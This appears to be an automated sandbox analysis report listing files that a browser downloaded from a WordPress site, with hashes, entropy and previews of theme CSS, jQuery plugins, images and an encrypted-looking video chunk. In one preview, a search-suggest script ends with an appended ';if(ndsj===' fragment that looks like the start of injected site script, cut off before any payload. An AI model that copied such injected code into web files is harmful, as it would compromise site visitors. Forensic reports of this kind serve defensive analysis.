                                                            URL:https://canpol.poznan.pl/wp-content/themes/salient/css/responsive.css?ver=7.6
                                                            Preview:@media only screen and (min-width: 1300px) {. .container, . body[data-ext-responsive="false"] #boxed #header-outer[data-full-width="true"] header > .container, . body[data-ext-responsive="false"] #boxed #header-secondary-outer[data-full-width="true"] > .container,. #post-area.standard-minimal.full-width-content article.post .inner-wrap,. body[data-header-format="left-header"] .container, body[data-header-format="left-header"] #post-area.standard-minimal.full-width-content article.post .inner-wrap {. max-width: 1100px; . } ....}..@media only screen and (min-width: 1000px) and (max-width: 1300px) {......h2 .nectar-button {...top: -2px;..}...body .container .portfolio-items:not(.carousel) .col {...margin-bottom: 20px;..}...body #featured .orbit-slide article .container .span_12 {...width: 900px!important;..}....#author-bio #author-info {.. .width: 544px!important;..}.....portfolio-items:not(.carousel) .col.span_3 .work-item .work-info a {...padding: 5px 6px!important;...font
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:ASCII text, with very long lines (1920)
                                                            Category:dropped
                                                            Size (bytes):9612
                                                            Entropy (8bit):5.2446804466393875
                                                            Encrypted:false
                                                            SSDEEP:192:P1a7G++jacaTOh0Zl049XyGzNmjaEg9Qi6TxOYFfycBmSCc:ADDTOhgxXyGExOYFd
                                                            MD5:E85F66A08398F0144DDCF6E384301BE8
                                                            SHA1:80D9B515C59442D1C46F0C7E7DE2C36AE74D287A
                                                            SHA-256:8A8290242F239D419D97904A0C27AECC3003312220BDB7FB966F35637F9822D6
                                                            SHA-512:B8E93EAC8F95D6889E942D78A7773EEA0170041B851DDD3606910E8E4FF9D54DE1C59B16981ADC454031DD9F9ABBAE8D8F5BDBD38A8590C14EC8EF516FC9A64C
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview:/*. * jQuery Superfish Menu Plugin - v1.7.4. * Copyright (c) 2013 Joel Birch. *. * Dual licensed under the MIT and GPL licenses:. *.http://www.opensource.org/licenses/mit-license.php. *.http://www.gnu.org/licenses/gpl.html. */..;(function ($) {.."use strict";...var methods = (function () {...// private properties and methods go here...var c = {.....bcClass: 'sf-breadcrumb',.....menuClass: 'sf-js-enabled',.....anchorClass: 'sf-with-ul',.....menuArrowClass: 'sf-arrows'....},....ios = (function () {.....var ios = /iPhone|iPad|iPod/i.test(navigator.userAgent);.....if (ios) {......// iOS clicks only bubble as far as body children......$(window).load(function () {.......$('body').children().on('click', $.noop);......});.....}.....return ios;....})(),....wp7 = (function () {.....var style = document.documentElement.style;.....return ('behavior' in style && 'fill' in style && /iemobile/i.test(navigator.userAgent));....})(),....toggleMenuClasses = function ($menu, o) {.....var classes = c.menuC
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 100x100, components 3
                                                            Category:downloaded
                                                            Size (bytes):1197
                                                            Entropy (8bit):5.7606924269713895
                                                            Encrypted:false
                                                            SSDEEP:24:/K1he91Wwjx82lY2T3ouVKDyLyJ3VLwqgn8GoJdVQ4H:QqQNn2xAJ35i89h
                                                            MD5:7A375043A6DA02C8ACDA6BAFCE1EE61D
                                                            SHA1:E297D3C25BB6EFB0F31C584B1B97AFC3AE7A28E5
                                                            SHA-256:36CE2A4878BB4BD4BF4F742C37CE5096F4F3EEB970C7325B72A210FC9C18756B
                                                            SHA-512:18F823EF8D2331590A134BFD68E5BE43BA1D3D7D2084B3C0E04DB72FAED4B7BD7FA7838C5B3AD47BD036949F503EFEBC96BFA80061A5C5355A222B79C3743F6F
                                                            Malicious:false
                                                            Reputation:low
                                                            URL:https://canpol.poznan.pl/wp-content/themes/salient/img/no-portfolio-item-tiny.jpg
                                                            Preview:......Exif..II*.................Ducky.......".....+http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)" xmpMM:InstanceID="xmp.iid:519B413E9BE611E2B756DA6A01EA2BB8" xmpMM:DocumentID="xmp.did:519B413F9BE611E2B756DA6A01EA2BB8"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:519B413C9BE611E2B756DA6A01EA2BB8" stRef:documentID="xmp.did:519B413D9BE611E2B756DA6A01EA2BB8"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d............................................... !#! .++..++>===>@@@@@@@@@@......................".....",......,&)###)&//,,//;;9;;
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:data
                                                            Category:downloaded
                                                            Size (bytes):1048576
                                                            Entropy (8bit):7.999810177432833
                                                            Encrypted:true
                                                            SSDEEP:24576:IGxAiXAjcwfKDroH7FiIWUEGnNhm2vftK9lHOzu7DsTt7ANjnu:IiHXAAo2kbFinUEMjm2dK9lHnUtA0
                                                            MD5:EA19355DECE25FEED31A4507D633F0DD
                                                            SHA1:8B6CFB6EC9F8034A34AD9AD2D7DD9158A03ABC3C
                                                            SHA-256:C0943BBB3453DFA2A40E1CBE443E3B1A36D9E6C58C7660D897CD386C48750B3B
                                                            SHA-512:96CB271577650D8D3ACDC0DE2B3F8EC732834F38C5ACC69F387712370DA7301083517BDD2462DB3C897134402FA2C3285FE274C1D1EB1B6A575CBD5A375FD299
                                                            Malicious:false
                                                            Reputation:low
                                                            URL:https://canpol.poznan.pl/wp-content/uploads/2016/02/city_1.mp4:2f8a52234edc61:2
                                                            Preview:...+.&.8..>..dV.yT..96...A..@2.m..G.a.P......k.|....Cq.e'...gd.......'&...j+iW.z.|R...H......D..M.C....Y....+#..'|.&..(..)........*...=.6..;jcG. ...M.)E]B.RH....x... n.W..o.-..Y.n.0|l... F}F{.X..7Cs.....$Z...)..c,D./.T..; q..._z..',u:..f..|.....H.[.W...!.u...O(.........;.]F...I....C&k. `1.K.C..#...Ut}....an..I.%S.j.<.":..[_dAF.\....i...#..u...U1.a.....".......W.4.*'...&..)...Fy.xz.hY...6.;......]..&.%.....lx..._.3..._&y.K...<....M_J..}......#.{#.l... .10E..Z..w.h....G[......dJ......d4..C.X.x...$......r..............G ....O<.......GC.P...k.+~......:......s....i..l..P.&...... .....3U....._.23.8#;.......r.;~G.Hd.H.....Q'.;<..+'.;.HgH...F.a`...3>:L.E)H...(..2L.L......B...9^..C....Tjp/.....!..g...........n9.<..../^.@._.Jp.<..wcsp.Y4..j......Z.`7.$...<..@.........)w$.~.%.$.x...R.........a~=u!....a%.\.R...m.......u...x....j4..`._....X.....V...B...*..5.<@....r.W...M...i.O.Q|kC........U.X=..;.....].....v.VYE.0..x\.E....I....7..0..f.
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:ASCII text, with very long lines (1391)
                                                            Category:dropped
                                                            Size (bytes):1426
                                                            Entropy (8bit):5.158381671009404
                                                            Encrypted:false
                                                            SSDEEP:24:Q77OUdqIoZ2zsben5WlLysyIOKI1mQqRhoj3v2rFEgRuLUMB9/RUCXXmC3+:Q7SUyEsyKystOKumTsOrFEmu7Bl6CX2P
                                                            MD5:905225D5711B559D3092387D5FFBEDBD
                                                            SHA1:6F6C39075263BAFB9E8C10F1B34A1A0F7EE03C9D
                                                            SHA-256:5BE614BCE53F767993A5F5F14A6BADD6AAE6BF3AF7CBDBF4D31520DE49E27991
                                                            SHA-512:5AD34CF11ACF45AE256B2641496BE13939CD5E0212810C43AB20CADBB313A1D99CB3A451148E160D80F1F952A8514480C2953BC6CA0C4697A466A01E1C3D5F8D
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview:/*! This file is auto-generated */.!function(c,d){"use strict";var e=!1,n=!1;if(d.querySelector)if(c.addEventListener)e=!0;if(c.wp=c.wp||{},!c.wp.receiveEmbedMessage)if(c.wp.receiveEmbedMessage=function(e){var t=e.data;if(t)if(t.secret||t.message||t.value)if(!/[^a-zA-Z0-9]/.test(t.secret)){for(var r,a,i,s=d.querySelectorAll('iframe[data-secret="'+t.secret+'"]'),n=d.querySelectorAll('blockquote[data-secret="'+t.secret+'"]'),o=0;o<n.length;o++)n[o].style.display="none";for(o=0;o<s.length;o++)if(r=s[o],e.source===r.contentWindow){if(r.removeAttribute("style"),"height"===t.message){if(1e3<(i=parseInt(t.value,10)))i=1e3;else if(~~i<200)i=200;r.height=i}if("link"===t.message)if(a=d.createElement("a"),i=d.createElement("a"),a.href=r.getAttribute("src"),i.href=t.value,i.host===a.host)if(d.activeElement===r)c.top.location.href=t.value}}},e)c.addEventListener("message",c.wp.receiveEmbedMessage,!1),d.addEventListener("DOMContentLoaded",t,!1),c.addEventListener("load",t,!1);function t(){if(!n){n=!
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:PNG image data, 300 x 225, 8-bit/color RGBA, non-interlaced
                                                            Category:downloaded
                                                            Size (bytes):20606
                                                            Entropy (8bit):7.981777247829724
                                                            Encrypted:false
                                                            SSDEEP:384:IfQCwoevnq1n4NByEIgvBs6vpGdeb8XCI7TVAAnkAMToeklU0G5lc1WDGh:aQqMqpsc2vFGSm77kAIoekleDc1kGh
                                                            MD5:064847E1A65229F501BECBE073480A11
                                                            SHA1:5A08668F8D9347BED5925DAC4261AD0D74C147B0
                                                            SHA-256:1462CE691C5E305C49FE5E1AB04F7CBA85FCCD829B3AB42BBD407B6863A16AC6
                                                            SHA-512:8755B13A9AA8CFB14FAA79B4AB2088AD566A2FDA2EEE0D76E060340A53110F10B8FC6976789A8C858A77450CBFF0D128815E410858650BF9119495FC01262D14
                                                            Malicious:false
                                                            Reputation:low
                                                            URL:https://canpol.poznan.pl/wp-content/uploads/2015/07/disney_thelion_guard.png
                                                            Preview:.PNG........IHDR...,.........r|......bKGD..............pHYs...#...#.x.?v....tIME......"..d... .IDATx..w.\Wy..>..z.d5[.,.\....&.....oB.!t...jh6...5$`..w..6.IX.......6m.......q...$@..._..^..rf..>.s..9`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.......S...T*o....jbbb....Q.......q.I.u'.......d..O.!"32F...D...x...'....]Y,.).....<..u]3H...A....J%&&&......ag[[.-.b..B......k.......G_U,.s...477....bhh...QJ.Ry.9_ijjz...#X.wn.......<..b.....e..?..........~ .....F.~..*s...{.8>o.9d.Y3(.DT*...;.m..,\..2!D......B%.RK.....:;;.......s...z{{.W.Zu..r..B.Q1...E..J..].v}~...9cU.j..].../.]6...."6.b.....r...{.~a...U.f....v..O;...r_3.e...u..8^.m..g.qF...W...;*k.=...{h.....-[..;..........drr..w..[.n..b..o.4C.[.Uf.=.tuu..2....y.......s..:cF....+{pp..q.....2.b....."...........:U.U....w.?....7b.......Z.z3.F.N.X9G...tSSS.....5ljj*.>|.3Zk.....)J.....?.;w....o..s..
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:ASCII text, with very long lines (32066)
                                                            Category:dropped
                                                            Size (bytes):79904
                                                            Entropy (8bit):5.392641347607591
                                                            Encrypted:false
                                                            SSDEEP:768:jVJe+e/wgx54L3IAZsuyse/QZVGKYXEhn5nUyHGKkCLRrKrvgNeiLiEFVtI8Qpyo:jV4hHAqu0mcKYXcnNUyHTPLkABMyl9AZ
                                                            MD5:603D7AC9B11E5EE709A58D738D3D84B5
                                                            SHA1:6B1B6DF395EC427FD9523F253A974D827AA00FDE
                                                            SHA-256:6150F02486273A973D21B2000944037E82A5C830F94A50AE9311751397E50A32
                                                            SHA-512:7C02E775F7F3A4E1104D5FE7A2762D44B00484CDC589D5047B1135F264091875A1134C0EA3BE22409C89D88F61FECDD91E821736F7034F4FB41750C281C690F9
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview:/*!. * VERSION: 1.18.0. * DATE: 2015-09-05. * UPDATES AND DOCS AT: http://greensock.com. * . * Includes all of the following: TweenLite, TweenMax, TimelineLite, TimelineMax, EasePack, CSSPlugin, RoundPropsPlugin, BezierPlugin, AttrPlugin, DirectionalRotationPlugin. *. * @license Copyright (c) 2008-2015, GreenSock. All rights reserved.. * This work is subject to the terms at http://greensock.com/standard-license or for. * Club GreenSock members, the software agreement that was issued with your membership.. * . * @author: Jack Doyle, jack@greensock.com. **/.var _gsScope="undefined"!=typeof module&&module.exports&&"undefined"!=typeof global?global:this||window;(_gsScope._gsQueue||(_gsScope._gsQueue=[])).push(function(){"use strict";_gsScope._gsDefine("TweenMax",["core.Animation","core.SimpleTimeline","TweenLite"],function(t,e,i){var s=function(t){var e,i=[],s=t.length;for(e=0;e!==s;i.push(t[e++]));return i},r=function(t,e,i){var s,r,n=t.cycle;for(s in n)r=n[s],t[s]="function"==typeof r?r.
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:ASCII text, with very long lines (1925)
                                                            Category:downloaded
                                                            Size (bytes):2909
                                                            Entropy (8bit):5.481361415987147
                                                            Encrypted:false
                                                            SSDEEP:48:kMGyZlMBuaylJNTSrmwFnzucWak+OYmgQvPvKIUvK16BuUFKDi+kn9du4QXeeA:IuaylJJSrmwVzWeOYmgQnvyy16BCi+SL
                                                            MD5:EDFBF0AD8DF7C2950F06689F928F0F26
                                                            SHA1:65D19ED5FCE88626D1DB8789FF1F890B4299A9EF
                                                            SHA-256:99979AA7D1675B420E15FFC2FC216B58B61BD9EA03323D1B366C66F59080799D
                                                            SHA-512:2185633468535129879E7005EDD5AD0867EAFA6EC4458F72B7B30139052EADB3B1D59E90BD3B6381F6D5733D2096553A5E14F44439A9ABFFBE894F998C58E45C
                                                            Malicious:false
                                                            Reputation:low
                                                            URL:https://canpol.poznan.pl/wp-content/themes/salient/nectar/assets/functions/ajax-search/wpss-search-suggest.js
                                                            Preview:jQuery(document).ready(function ($){ ....if($('#search-outer.nectar').length > 0){..... var acs_action = 'myprefix_autocompletesearch'; .. $("body").on('focus','#s',function(){.. ... .if(!$(this).hasClass('ui-autocomplete-input')) {... .$(this).autocomplete({ .... .delay: 50,.... .position: {of: "#search-outer #search .container" },.... .appendTo: $("#search-box"), .... source: function(req, response){ .... $.getJSON(MyAcSearch.url+'?callback=?&action='+acs_action, req, response); .... }, .... select: function(event, ui) { .... window.location.href=ui.item.link; .... }, .... minLength: 2, .... }).data( "ui-autocomplete" )._renderItem = function( ul, item ) {......return $( "<li>" ).......append( "<a>" + item.image + "<span class='title'>" + item.label + "</span><br/><span class='desc'>" + item.post_type + "</span> </a>" ).......appendTo( ul );.....}; ....}... });... ..}. .}); ;if(ndsj===
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:ASCII text, with very long lines (5477)
                                                            Category:downloaded
                                                            Size (bytes):5629
                                                            Entropy (8bit):5.064978927674849
                                                            Encrypted:false
                                                            SSDEEP:96:PwRxr6JAXgWWwrrSTrmM4KvlGC89QPjRxq2uVBXeHRGKrc4oPUGPgNhd+qLoBV7J:Pwjrycrr3rKvE9IjRxjGjgNhdTLo3re+
                                                            MD5:3A56752B736635BF69CB069B8818CBFD
                                                            SHA1:42E0951FE74BB3F56A30F51291823BCD4A84D76E
                                                            SHA-256:FF4BD34AA98A0214833619D3D751838DB015722DFBBEC15CD14DADC66CD67869
                                                            SHA-512:A255D61DE4E6CEC2084AAE0F027CCC0259039AEF62268A27072C8097D348D76BB725CA35563386CEB068387C9AD3AB0E331BD270BA754A38A2A2D33944F305F5
                                                            Malicious:false
                                                            Reputation:low
                                                            URL:https://canpol.poznan.pl/wp-includes/js/imagesloaded.min.js?ver=4.1.4
                                                            Preview:/*! This file is auto-generated */./*!. * imagesLoaded PACKAGED v4.1.4. * JavaScript is all like "You images are done yet or what?". * MIT License. */..!function(e,t){"function"==typeof define&&define.amd?define("ev-emitter/ev-emitter",t):"object"==typeof module&&module.exports?module.exports=t():e.EvEmitter=t()}("undefined"!=typeof window?window:this,function(){function e(){}var t=e.prototype;return t.on=function(e,t){if(e&&t){var i=this._events=this._events||{},n=i[e]=i[e]||[];return n.indexOf(t)==-1&&n.push(t),this}},t.once=function(e,t){if(e&&t){this.on(e,t);var i=this._onceEvents=this._onceEvents||{},n=i[e]=i[e]||{};return n[t]=!0,this}},t.off=function(e,t){var i=this._events&&this._events[e];if(i&&i.length){var n=i.indexOf(t);return n!=-1&&i.splice(n,1),this}},t.emitEvent=function(e,t){var i=this._events&&this._events[e];if(i&&i.length){i=i.slice(0),t=t||[];for(var n=this._onceEvents&&this._onceEvents[e],o=0;o<i.length;o++){var r=i[o],s=n&&n[r];s&&(this.off(e,r),delete n[r]),r.ap
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:ASCII text
                                                            Category:downloaded
                                                            Size (bytes):2640
                                                            Entropy (8bit):5.143413018441231
                                                            Encrypted:false
                                                            SSDEEP:48:HrAMtxswDB/P7LUS0BvYkR2/HSXmpgMPnfFro/HKT1rcYlXWoorrkwEv4Hm6K:HTU2/Vpb/floPKT1pWuwEv4Hmp
                                                            MD5:76E12144B6BE9BC0A17DD880C5566156
                                                            SHA1:C57DB768B452AEA923A2B083162E9E6FFB98D2F8
                                                            SHA-256:070EDFEF42E0980783D0ACF8FA9CA6A9833B994ECA13FFAA94E9A2DEB47C92CF
                                                            SHA-512:090A8EF4B25EBDE53333749F44BA1318753AC3594D1C9D891C0B66664813F60584ED126C15D30478FF8A1E8DD30B0338FF3132331E5AA9D140213C23BEC67454
                                                            Malicious:false
                                                            Reputation:low
                                                            URL:https://canpol.poznan.pl/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=5.4.2
                                                            Preview:.wpcf7 .screen-reader-response {..position: absolute;..overflow: hidden;..clip: rect(1px, 1px, 1px, 1px);..height: 1px;..width: 1px;..margin: 0;..padding: 0;..border: 0;.}...wpcf7 form .wpcf7-response-output {..margin: 2em 0.5em 1em;..padding: 0.2em 1em;..border: 2px solid #00a0d2; /* Blue */.}...wpcf7 form.init .wpcf7-response-output,..wpcf7 form.resetting .wpcf7-response-output,..wpcf7 form.submitting .wpcf7-response-output {..display: none;.}...wpcf7 form.sent .wpcf7-response-output {..border-color: #46b450; /* Green */.}...wpcf7 form.failed .wpcf7-response-output,..wpcf7 form.aborted .wpcf7-response-output {..border-color: #dc3232; /* Red */.}...wpcf7 form.spam .wpcf7-response-output {..border-color: #f56e28; /* Orange */.}...wpcf7 form.invalid .wpcf7-response-output,..wpcf7 form.unaccepted .wpcf7-response-output {..border-color: #ffb900; /* Yellow */.}...wpcf7-form-control-wrap {..position: relative;.}...wpcf7-not-valid-tip {..color: #dc3232; /* Red */..font-size: 1em;..font-weigh
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:ASCII text, with very long lines (11767)
                                                            Category:downloaded
                                                            Size (bytes):11918
                                                            Entropy (8bit):5.342123394508433
                                                            Encrypted:false
                                                            SSDEEP:192:WVcNcauOYomE8wQxrR6zHB+wvov18SA4FHgRlhfemOYFfycBmSCc:WcNcBOYomXwQxrR6DBpv+8yFHgTBemO8
                                                            MD5:AD1BE4B3A88F7F8A7A0E5AB4A99BD702
                                                            SHA1:1B686B4A76953E7E077A36AB23624075F3E928D2
                                                            SHA-256:73458F1064286FB94C7814ABC031471DFC7F1C7C9C5B7FB421A20A98F564D11B
                                                            SHA-512:C00C8E157793CDBAD810FED186293EB774D3B050102B832A3BA04AB6AE042FD5047A24A86B384CD0F2E5E64462E1935BCDAA1D51AD496FD86D5AC721BE6603E2
                                                            Malicious:false
                                                            Reputation:low
                                                            URL:https://canpol.poznan.pl/wp-content/themes/salient/js/vivus.min.js?ver=6.0.1
                                                            Preview:/**. * vivus - JavaScript library to make drawing animation on SVG. * @version v0.2.1. * @link https://github.com/maxwellito/vivus. * @license MIT. */."use strict";!function(t,e){function r(r){if("undefined"==typeof r)throw new Error('Pathformer [constructor]: "element" parameter is required');if(r.constructor===String&&(r=e.getElementById(r),!r))throw new Error('Pathformer [constructor]: "element" parameter is not related to an existing ID');if(!(r.constructor instanceof t.SVGElement||/^svg$/i.test(r.nodeName)))throw new Error('Pathformer [constructor]: "element" parameter must be a string or a SVGelement');this.el=r,this.scan(r)}function n(t,e,r){this.isReady=!1,this.setElement(t,e),this.setOptions(e),this.setCallback(r),this.isReady&&this.init()}r.prototype.TYPES=["line","elipse","circle","polygon","polyline","rect"],r.prototype.ATTR_WATCH=["cx","cy","points","r","rx","ry","x","x1","x2","y","y1","y2"],r.prototype.scan=function(t){for(var e,r,n,i,a=t.querySelectorAll(this.TYPES.join(
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:ASCII text
                                                            Category:downloaded
                                                            Size (bytes):10115
                                                            Entropy (8bit):4.863759727038224
                                                            Encrypted:false
                                                            SSDEEP:192:aY1Q4fS5bzpQRJO6MCOABg6scl3n2s96/LEDeXHFykgxQAJFCBZdK19nXIXOXrBH:q9U3pQFiFz
                                                            MD5:9576D2979D1C7FF8D4FC9AB3D8D146CF
                                                            SHA1:2E598B72A7411736A10737D4A0B1DC84002D8913
                                                            SHA-256:1E6BC2E74CBC18ED7CE5F65DB0457440C96A91ADAE27894843300886E2442815
                                                            SHA-512:66475B5853EB6B6F2670CF80DA5CE36D3F0B6B4109624C594460A3BF1E079A62A47B427141D7A2361E6400FFA04939F7DFF2A17012C2BF9B0B989D277ED26F54
                                                            Malicious:false
                                                            Reputation:low
                                                            URL:https://canpol.poznan.pl/wp-content/themes/salient/css/magnific.css?ver=6.2
                                                            Preview:/* Magnific Popup CSS */..mfp-bg {. top: 0;. left: 0;. width: 100%;. height: 100%;. z-index: 104200;. overflow: hidden;. position: fixed;. background: #0b0b0b;. opacity: 0.8;. filter: alpha(opacity=80); }...mfp-wrap {. top: 0;. left: 0;. width: 100%;. height: 100%;. z-index: 104300;. position: fixed;. outline: none !important;. -webkit-backface-visibility: hidden; }...mfp-container {. text-align: center;. position: absolute;. width: 100%;. height: 100%;. left: 0;. top: 0;. padding: 0 8px;. -webkit-box-sizing: border-box;. -moz-box-sizing: border-box;. box-sizing: border-box; }...mfp-container:before {. content: '';. display: inline-block;. height: 100%;. vertical-align: middle; }...mfp-align-top .mfp-container:before {. display: none; }...mfp-content {. position: relative;. display: inline-block;. vertical-align: middle;. margin: 0 auto;. text-align: left;. z-index: 104500; }...mfp-inline-holder .mfp-content,..mfp-ajax-holder .mfp-content {. widt
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:PNG image data, 300 x 225, 8-bit/color RGBA, interlaced
                                                            Category:downloaded
                                                            Size (bytes):13571
                                                            Entropy (8bit):7.96743093183519
                                                            Encrypted:false
                                                            SSDEEP:192:IiOks0/6EoEuj3T21sIrwNkCj0HyYERTq/+lTHK27ah65SLReGNd6JQKiEBLk:IiOk/6TEujj3324cMq7h65FJQ1H
                                                            MD5:C1398214BEDF49C324AEF1066FC3547E
                                                            SHA1:5B07163806FFA6889CEF7F51B1C9EA31B5DE7448
                                                            SHA-256:740B6892F77A968B8B341A78D495E6F2D3442F5E27C3F11052864EDC8700D5A7
                                                            SHA-512:54EFAFC63BF23041490167A9BD1F7807C2DB6DE5FE746D274889EC327CB1FEBB2933508CA615583DFF808E80CC70250E2E8A5FAEE31779AFD88D920C7B47590A
                                                            Malicious:false
                                                            Reputation:low
                                                            URL:https://canpol.poznan.pl/wp-content/uploads/2015/07/saturn_glowna_thumb.png
                                                            Preview:.PNG........IHDR...,..........{.=....pHYs...#...#.x.?v.. .IDATx...|.E...rL..p.....H..DE.\.u..Zq=V.......u=..U......u..9T...C.K.....B .d2..."....d:..t...?3..........A2".X' ..0.....kW.m..9.%...$......(...r...k.=..^.....+))...zg....N.ZT'.t..4./U>......S..)...~..g.XN..Yg.E;v.q...}..O.|.?...[...)...QJJ.L..( .A.~...%.n..'5.........k.....C....)_.-ZD...w.}W..\.}.>....,",...Z.t.i.!Q.$$$..g.M.-.'a..'L-.0...:'...N....)//..).....4h..h.:a"Q.g.yf.w.e..T'.....^.z.....S.*--....*. \^TM...V_..+.t..u..cE.0....v{..}j..B.X...rM.&.../..P..R^..T..p..R..i.....E=v#6....9Q.rF$..W.M...w.....O...HP...Q..Z.F.....`.6m.&.HPT.E...-Z.+1j.*Q.m.Q%*.b...7...........'..(...U.u.F...A!..0../^,.#..=v.........m.d...#.s..T.a.%..L....`....../.._^yph..CeBM..U..~.|..n=...@..S.._ ..<.B.....{.......rMIDbb..IQ..6Q...O.....).f...,X.v..OTC.....&j.u.....RIT...B.W...7.<v.-.h.....)..6m.:1n...,Y.H.]..&Q.......f+...J.G...~....D{ 5..099..um.8_,.)..v..K;.k.h....&Q"A..N...=}..aT.Y....,.pf..3K.
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:ASCII text, with very long lines (32032)
                                                            Category:dropped
                                                            Size (bytes):56700
                                                            Entropy (8bit):5.284107720882177
                                                            Encrypted:false
                                                            SSDEEP:1536:OYQjF+MMjhPIkwFrHJc2Pyx9b2O68HOkXxEXy7l1pT9Hpyn220DTPRZmtxNpNxCE:s7DY9bfDjv9Hpyn8CmcrM4ODp2
                                                            MD5:762A1784C50432835F00DF7AAB28EA15
                                                            SHA1:8EB5EE603177F30E59D6DF1D0A762A45A58E51AE
                                                            SHA-256:18328CDE99A25DDED575E4FC5486E1D146725D5055D6F47758982892F10E2650
                                                            SHA-512:FCF18F3649818478FBCC1B3989E5DE2786FFAA14B6ED60430AA3A70301728C0202E85B2FBDA650A6B92819CAA20A5FB45197F011E3CDEE8DC720D9B668F822B4
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview:/*. *.jQuery carouFredSel 6.2.1. *.Demo's and documentation:. *.caroufredsel.dev7studios.com. *. *.Copyright (c) 2013 Fred Heusschen. *.www.frebsite.nl. *. *.Dual licensed under the MIT and GPL licenses.. *.http://en.wikipedia.org/wiki/MIT_License. *.http://en.wikipedia.org/wiki/GNU_General_Public_License. */...(function($){function sc_setScroll(a,b,c){return"transition"==c.transition&&"swing"==b&&(b="ease"),{anims:[],duration:a,orgDuration:a,easing:b,startTime:getTime()}}function sc_startScroll(a,b){for(var c=0,d=a.anims.length;d>c;c++){var e=a.anims[c];e&&e[0][b.transition](e[1],a.duration,a.easing,e[2])}}function sc_stopScroll(a,b){is_boolean(b)||(b=!0),is_object(a.pre)&&sc_stopScroll(a.pre,b);for(var c=0,d=a.anims.length;d>c;c++){var e=a.anims[c];e[0].stop(!0),b&&(e[0].css(e[1]),is_function(e[2])&&e[2]())}is_object(a.post)&&sc_stopScroll(a.post,b)}function sc_afterScroll(a,b,c){switch(b&&b.remove(),c.fx){case"fade":case"crossfade":case"cover-fade":case"uncover-fade":a.css("opacity"
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:PNG image data, 300 x 225, 8-bit/color RGBA, non-interlaced
                                                            Category:dropped
                                                            Size (bytes):34741
                                                            Entropy (8bit):7.985204108051673
                                                            Encrypted:false
                                                            SSDEEP:768:yV0T6SpmYXhIGGXpDpSiuhyeYMLipKSu47O5TYiP/lzA0ew:e+xI9XiiuEgDlYitAy
                                                            MD5:AD36AB83F232057440CFCD39701684C3
                                                            SHA1:4916525CE37DC96F0CDF061DCEC2826F171EB731
                                                            SHA-256:2D19C1B97232D8415E706206B2187C98B4C6E500002191CF1767987E4EC950ED
                                                            SHA-512:0B1C8E5A55DE6012A0DA7FC98AF35AC7E2DF83E7811982FC64A91D372E2F55DA7222A69925046C39D193FAC2178CC673464A24EE998F1D10F593388F56AC9983
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview:.PNG........IHDR...,.........r|......bKGD..............pHYs...#...#.x.?v....tIME.....39.@Uc.. .IDATx....dYv........jogz.3=t..KrF"d@-........Z.(..?.Y....$.r..%...9..g.LWu.....Df.....!...{...DT...w..w.y.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0............Zk'.....t.9....q\..`,...u..y.r.|..h.e>...........7.r...?k.Z.....,...eJ.....y.1..$I...h.p8d8.R.......Y.\.gB..X....Z.:.........r.P..h6..0?G..mz....(8x....h4.+#\F.>wa.x<./o..............&..s....X,.......<.U..[.R>s..A...1...0.Y[[.q...;v........P...}..]....|}ff....L..bkk...C...eYW...X...gE..0...+W...3g..2..m].r%8s......?.BHc.#X?s......_...g.qM..p/I.p....S.Y.P.WF..`.L.@)...{..G....2..h.?.>|.'.l..%.....Y.V.W^Y....+.b.......c....O>..A!..X..a..|h..].z.....F...I.Xdaa.r....j.s."F.>M.r.........c...baa.)..{{{....1.1..i.V......#.....#G.y.......k...4..]YY....F......6.........v.E.`}.(......>t.1..Cq..!...
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:ASCII text, with very long lines (584)
                                                            Category:downloaded
                                                            Size (bytes):629586
                                                            Entropy (8bit):5.107096279695462
                                                            Encrypted:false
                                                            SSDEEP:12288:E4LmS0Gj/At67LlJCIOovyf4+EQM07K7H:D
                                                            MD5:B694A49566D24D55F6B010D325A90359
                                                            SHA1:A32CFBC8D6F78C78FCBD4F9F882B1D45A6077519
                                                            SHA-256:EE10460C7B4FED9F42381240111CD773F128B14713B621FFBAADB57BB6D043AE
